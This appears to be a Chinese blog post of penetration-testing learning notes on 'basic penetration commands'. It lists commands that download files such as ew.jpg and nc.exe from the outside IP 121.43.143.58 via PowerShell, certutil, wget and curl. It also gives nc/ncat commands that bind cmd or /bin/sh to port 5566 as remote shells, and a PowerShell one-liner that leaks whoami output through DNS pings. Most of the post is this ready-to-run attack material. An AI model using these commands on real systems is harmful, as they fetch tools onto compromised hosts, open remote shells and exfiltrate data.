基本渗透命令

mikuku6个月前叽里咕噜小代码173

文件上传下载-解决无图形化-解决数据传输

Windows文件下载命令

pwershell:

powershell.exe -Command "Invoke-WebRequest -Uri http://121.43.143.58:80/ew.jpg -OutFile ew.png"

cmd:

certutil.exe -urlcache -split -f http://121.43.143.58:80/ew.jpg ew.png

linux文件下载命令

wget http://121.43.143.58:80/ew.jpg -O ew.png
curl http://121.43.143.58:80/ew.jpg -o ew.png

反弹SHELL命令-解决数据回显-解决数据通讯

正向连接:本地连接-等待监听

linux-控制->windows

/绑定cmd到5566端口

nc -e cmd -lvvp 5566

image.png

/主动连接目标5566

 ncat 121.43.143.58 5566

image.png

windows-控制->linux

/绑定sh到本地5566端口

 ncat -e /bin/sh -lvp 5566

image.png

/主动连接目标5566

nc 47.242.156.108 5566

反向连接

结果相同,不作过多赘述。


shell反弹:

1.首先判断操作系统

由于windows没有nc,我们可以利用漏洞上传到服务器

文件上传windows:

certutil.exe -urlcache -split -f http://121.43.143.58:80/nc.exe E:\\nc.exe

linux:

curl http://121.43.143.58:80/nc.exe -o nc.exe


已知漏洞:

数据不回显:
1.反弹shell

2.带外查询

cmd里无法使用whoami

用powershell变量赋值,把whoami执行结果给变量

结果带有“\”,导致ping无法执行,所以使用replace替换字符

powershell|| $x=whoami;$x=$x.replace('\','xxx');$y=.'某个地址';$z=$x+$y;ping $z

image.png

image.png





返回列表

上一篇:心脏

下一篇:基础入门

相关文章

墨者靶场-SQL注入-参数加密

墨者靶场-SQL注入-参数加密

访问当前地址叽里咕噜可以发现有一个可以看到的参数在URL中可以看到有一个加密的数据而对加密数据我们肯定首先要判断他是什么加密,所以我们直接看能不能找到他的源码,使用御剑进行扫描可以发现一个目录,我们访...

基础入门

基础入门

抓包技术-HTTPS协议-APP&小程序&PC应用&WEB转发联动抓包技术-HTTP/S-WEB&APP&小程序&PC应用1.掌握HTTP/抓包工具的使...

安全开发-web应用-PHP-框架开发

安全开发-web应用-PHP-框架开发

一开始我们学习信息打点的时候我们介绍过了框架这个东西,框架就是第三方开发的一个源码,里面核心内容也就是网站的各个功能都是开发好的,只需要把相应的配置配好,就可以直接开始使用了,对于简单的网站搭建还是很...

WEB攻防-PHP-SQL注入基础篇

WEB攻防-PHP-SQL注入基础篇

上期说到关于ASP语言搭建的项目,而那个用的是ACCESS数据库,并且现在基本上看不到这个语言搭建的项目了,所以上期基本上就是为后面的这个php和别的语言铺垫内,之前留了那么久的坑,从这一期开始填着重...

安全开发-web应用-JS-dom_xss-断点调试

安全开发-web应用-JS-dom_xss-断点调试

上期我们简单的学习了关于js的文件上传和登录验证,相信大家对那部分的漏洞已经有所了解了,这期我们来看看关于js的外的一些知识DOM树操作以及安全隐患加密编码和数据安全测试这两个因为关系不大,就新开一期...

安全开发-web应用-JS-Nodejs

安全开发-web应用-JS-Nodejs

上期我们学习了关于原生开发的DOM树和学习了断点调试,又知道了关于dom-xss的漏洞捏,简单的利用了js调试来尝试加密数据包,好用捏今天我们来看看关于第三方库的使用什么事nodejs呢,他是运行在服...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。